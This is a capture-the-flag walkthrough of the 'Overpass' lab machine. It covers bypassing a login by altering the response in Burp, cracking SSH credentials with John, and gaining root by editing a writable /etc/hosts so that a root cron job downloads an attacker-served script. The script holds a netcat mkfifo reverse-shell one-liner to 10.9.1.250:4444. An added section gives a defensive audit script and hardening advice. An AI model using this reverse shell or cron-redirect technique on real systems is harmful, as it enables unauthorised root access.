Overpass

Port Scan

Directory Scan

Web Exploitation
After seeing all the directories, /admin was the most interesting to me. Looking at the source code, I found some interesting .js files.

login.js

This piece of code has a vulnerability: it checks the response received by the browser, and if that response is not "incorrect credentials", it redirects us to the /admin page.
Get admin privilege
Intercept the login request with Burp Suite and change the response to get the admin panel.
Right-click on the request and choose
Do intercept > Response to this request
This is the response we get

Updated response

Admin homepage

User Shell
We got a username from the admin panel, and I used John to crack the SSH password.

We successfully got a shell

Root shell
I used a Python HTTP server to get linpeas onto the machine.


We have permission to write to /etc/hosts.

There's a cron job running as root which basically uses curl and pipes the output into bash.
We are going to change the content of /etc/hosts, adding our IP as overpass.thm.

First, create the files on your local machine.

Add a payload in buildscript.sh:
└─$ cat downloads/src/buildscript.sh
#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.9.1.250 4444 >/tmp/f
Add your IP and port:
[ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc (IP) (PORT) >/tmp/f ]
Start a python3 server
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.120.231 - - [02/Feb/2022 18:17:05] "GET /downloads/src/buildscript.sh HTTP/1.1" 200 -
Start a netcat listener.
Wait around 1 minute to get a root shell.
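The two conditions this privilege escalation relies on, a root cron job that pipes a curl download straight into bash and an /etc/hosts file that non-root users can write, are exactly what a host audit should catch before anyone else does. The script below is an added example written for this page, not part of the original writeup or of the Overpass machine: the crontab content it scans is constructed for illustration (the overpass.thm line mirrors what the writeup describes, the other lines are made up), and the function names are my own.

```shell
#!/bin/sh
# Added example, not from the original writeup: a small audit that
# (1) flags cron jobs which fetch a script with curl/wget and pipe it into
# a shell, and (2) reports whether a file (here /etc/hosts) is writable by
# users other than its owner and group. Sample crontab content below is
# constructed for illustration and is not the target's real file.

# Print every non-comment line of a crontab file in which curl or wget
# output is piped into sh or bash (optionally via sudo), e.g. "curl ... | bash".
find_pipe_to_shell_jobs() {
    grep -E '^[^#]*(curl|wget)[^|]*[|][[:space:]]*(sudo[[:space:]]+)?(ba)?sh([[:space:]]|$)' "$1"
}

# Count such jobs; prints 0 if the file has none.
count_pipe_to_shell_jobs() {
    find_pipe_to_shell_jobs "$1" | wc -l | tr -d ' '
}

# Succeed (exit 0) if the file's mode grants write access to "other".
# Reads the mode string from ls -l so it works with GNU and BSD tools:
# character 9 of "-rw-rw-rw-" is the other-write bit.
writable_by_others() {
    [ "$(ls -ld "$1" 2>/dev/null | cut -c9)" = "w" ]
}

# Constructed sample crontab (not the machine's real /etc/crontab).
sample=$(mktemp)
cat > "$sample" <<'EOF'
# m h dom mon dow user command
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
0 3 * * * root /usr/local/bin/backup.sh
*/5 * * * * root wget -qO- http://updates.example/run.sh | sudo sh
EOF

echo "cron jobs that pipe a download into a shell:"
find_pipe_to_shell_jobs "$sample"
echo "count: $(count_pipe_to_shell_jobs "$sample")"

# A writable hosts file lets any local user redirect the hostname those
# jobs fetch from, so the two findings together are the real risk.
if writable_by_others /etc/hosts; then
    echo "/etc/hosts is writable by other: cron downloads can be redirected"
else
    echo "/etc/hosts is not writable by other"
fi
rm -f "$sample"
```

The regular expression deliberately ignores anything after a `#`, so a commented-out job is not reported, and it matches `sh` or `bash` only as the whole command after the pipe, so `| shred` or `| zsh` are not false positives. The fix on the defending side is the obvious one: the cron job should run a locally stored, root-owned script rather than whatever a hostname resolves to at the moment, and /etc/hosts should be mode 644 owned by root.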

